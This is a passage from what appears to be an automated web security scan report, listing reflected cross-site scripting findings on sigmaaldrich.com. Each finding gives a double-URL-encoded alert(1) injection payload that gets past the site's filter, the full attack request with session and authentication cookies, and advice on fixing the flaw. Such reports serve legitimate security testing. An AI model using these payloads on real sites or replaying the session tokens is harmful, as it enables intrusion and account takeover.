Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:29 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc6a310";alert(1)//f26cf6c70bc/medialib/logos/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.409. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d92%2522%253balert%25281%2529%252f%252f46ed92c24e1 was submitted in the REST URL parameter 2. This input was echoed as e4d92";alert(1)//46ed92c24e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibe4d92%2522%253balert%25281%2529%252f%252f46ed92c24e1/logos/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:31 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibe4d92";alert(1)//46ed92c24e1/logos/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.410. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a36%2522%253balert%25281%2529%252f%252fc437b656de1 was submitted in the REST URL parameter 3. This input was echoed as f2a36";alert(1)//c437b656de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logosf2a36%2522%253balert%25281%2529%252f%252fc437b656de1/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logosf2a36";alert(1)//c437b656de1/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.411. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a1%2522%253balert%25281%2529%252f%252f9227d059c3 was submitted in the REST URL parameter 4. This input was echoed as 6a0a1";alert(1)//9227d059c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/center-graphics6a0a1%2522%253balert%25281%2529%252f%252f9227d059c3/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/center-graphics6a0a1";alert(1)//9227d059c3/services","E404") ;
   </script>
...[SNIP]...

1.412. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c5fe%2522%253balert%25281%2529%252f%252f608695bbae9 was submitted in the REST URL parameter 5. This input was echoed as 3c5fe";alert(1)//608695bbae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/center-graphics/services3c5fe%2522%253balert%25281%2529%252f%252f608695bbae9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/center-graphics/services3c5fe";alert(1)//608695bbae9","E404") ;
   </script>
...[SNIP]...

1.413. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4905f%2522%253balert%25281%2529%252f%252f4f88a8734e2 was submitted in the REST URL parameter 1. This input was echoed as 4905f";alert(1)//4f88a8734e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc4905f%2522%253balert%25281%2529%252f%252f4f88a8734e2/medialib/logos/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
